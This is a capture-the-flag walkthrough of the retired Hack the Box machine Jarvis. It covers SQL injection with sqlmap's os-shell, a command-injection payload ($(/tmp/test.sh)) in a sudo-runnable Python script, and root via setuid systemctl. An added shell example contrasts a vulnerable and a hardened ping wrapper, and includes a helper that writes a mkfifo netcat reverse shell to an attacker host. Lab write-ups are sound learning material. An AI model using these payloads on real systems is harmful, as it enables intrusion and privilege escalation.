Hack the Box — Retired Machine — Jarvis
Let's start with an nmap scan (Sparta, which wraps nmap and nikto, works just as well).
Ports 22 (SSH) and 80 (HTTP) are open.
Next, check the Sparta or nikto output for interesting directories.
As the screenshot shows, there is a PHP changelog, which is worth a look, so let's visit that first.
It contains nothing useful by itself, but the log entries show that the site uses MySQL.
The site on port 80 also exposes a phpMyAdmin page, which prompts for a username and password; my first thought was brute force.
Instead I went back to the main page and read its source, which contains links such as “<h3><a href="/room.php?cod=1">Superior Family Room</a></h3>”, so I visited /room.php?cod=1.
Changing the 1 to 2 or 3 returns a different room.
So I replaced the number with a single quote to see whether the page returns a SQL error, as below.
It does not print an error, but the response breaks when the single quote is inserted, which strongly suggests SQL injection in the cod parameter.
So I handed the URL to sqlmap with the --os-shell option, which uses the injection to drop a web shell and gives an OS command prompt.
And bingo: we get an os-shell running as www-data.
Now, to find a way to another user, let's check whether our current user can run any programs as another user or as root, using the command below (sudo -l).
The os-shell is not stable, so let's spawn a proper reverse shell: run a Python one-liner from the os-shell that connects back to a port on which nc is listening on Kali.
Now that's a prettier shell.
As the screenshot shows, www-data may run simpler.py as the pepper user. Let's run simpler.py to see what it does, and then cat it.
It offers listing and pinging; now let's cat simpler.py.
Look at the line that executes ping: the user-supplied host is placed straight into the command string, so it is vulnerable to command injection.
If we can make simpler.py run a command of our choosing inside that ping, it will run with pepper's privileges. So write a test.sh containing a netcat reverse shell on Kali (or any attacker machine), serve it, and wget it onto the victim as below:
Note the error in the screenshot: wget into the Admin-Utilities folder fails with a permission error, so download the file to /tmp instead, which succeeds.
First make test.sh executable (chmod +x), since it has to run as a script.
Now run simpler.py as pepper with sudo -u pepper, and start a netcat listener on Kali on port 1235, the port given in test.sh.
When asked for the IP to ping, give a bogus IP followed by $( and the path to the script, closed with ), i.e. $(/tmp/test.sh). The shell evaluates that command substitution when it runs ping, so test.sh executes and we get a shell with pepper's privileges.
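As an added example (not code from the write-up or from the Jarvis box), the script below models the ping line in simpler.py as a tiny wrapper that builds a command string from user input, shows why a host of the form x$(/tmp/test.sh) gets executed, and puts a hardened version beside it. The real simpler.py code, its filter list, and the exact contents of test.sh are not on this page, so the wrapper, the write_test_sh helper and the listener address are assumptions; ping is replaced by "echo ping" so it runs offline.

```shell
#!/bin/sh
# Added example, not from the original write-up. Models the vulnerable
# ping line as a shell wrapper (assumption) and contrasts a safe version.

# Vulnerable pattern: the host is interpolated into a string that a shell
# later evaluates, so $(...) inside the host is expanded and run.
# "echo ping" stands in for the real ping so the example runs offline.
vulnerable_ping() {
    host="$1"
    sh -c "echo ping -c 1 $host"
}

# Hardened pattern: accept only a dotted-quad IPv4 address and pass it as a
# single argument, never through a shell string.
safe_ping() {
    host="$1"
    case "$host" in
        "" | *[!0-9.]* | .* | *. | *..* ) return 1 ;;   # digits and dots only
    esac
    IFS=. read -r a b c d rest <<EOF
$host
EOF
    [ -n "$d" ] && [ -z "$rest" ] || return 1        # exactly four octets
    for octet in "$a" "$b" "$c" "$d"; do
        [ "$octet" -le 255 ] || return 1
    done
    echo ping -c 1 "$host"
}

# Build the payload the write-up describes: a bogus IP with the script path
# appended inside a command substitution.
injection_payload() {
    printf '%s$(%s)' "$1" "$2"
}

# Write a test.sh that connects back to a netcat listener. This mkfifo form
# is one common netcat reverse shell (assumption: the page does not show
# the script's contents). Listener port 1235 matches the write-up.
write_test_sh() {
    path="$1"; lhost="$2"; lport="${3:-1235}"
    cat > "$path" <<EOF
#!/bin/sh
rm -f /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc $lhost $lport > /tmp/f
EOF
    chmod +x "$path"
}

# Stand-alone usage: the injected command is a harmless echo here.
vulnerable_ping "$(injection_payload 1.1.1.1 'echo INJECTED')"   # ping -c 1 1.1.1.1INJECTED
safe_ping "$(injection_payload 1.1.1.1 'echo INJECTED')" || echo "rejected"
```

The vulnerable wrapper prints "ping -c 1 1.1.1.1INJECTED": the substitution ran before ping ever saw the host, which is exactly what happens when the script path is placed there. The hardened wrapper rejects the same input before any shell evaluates it, and would also reject backtick, semicolon and pipe variants because it refuses everything but digits and dots.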
And there it is: we have a shell as pepper, who owns the user flag.
Now let's escalate to root. For this we look for setuid binaries.
systemctl is setuid root, so that is what we will exploit.
Create a service unit as shown in the screenshot below.
Then start a listener on the Kali machine; but before that, wget the unit file from Kali onto the victim and chmod 777 it.
Enable (and start) the service; note that systemctl needs the absolute path to the unit file.
And there is root!
Now let's read the root flag.